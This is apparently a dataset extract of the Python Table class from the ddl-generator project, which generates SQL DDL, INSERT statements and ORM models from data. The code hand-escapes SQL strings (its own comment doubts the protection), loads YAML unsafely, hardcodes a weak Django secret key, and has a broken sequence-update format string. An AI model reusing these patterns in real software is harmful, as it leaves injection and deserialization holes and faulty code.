sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result | Dumps Python code to set up the table's SQLAlchemy model | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L292-L320 | null | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result)
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table._prep_datum | python | def _prep_datum(self, datum, dialect, col, needs_conversion):
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum | Puts a value in proper format for a SQL string | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L360-L385 | null | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result)
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.emit_db_sequence_updates | python | def emit_db_sequence_updates(self):
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval | Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L389-L407 | null | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
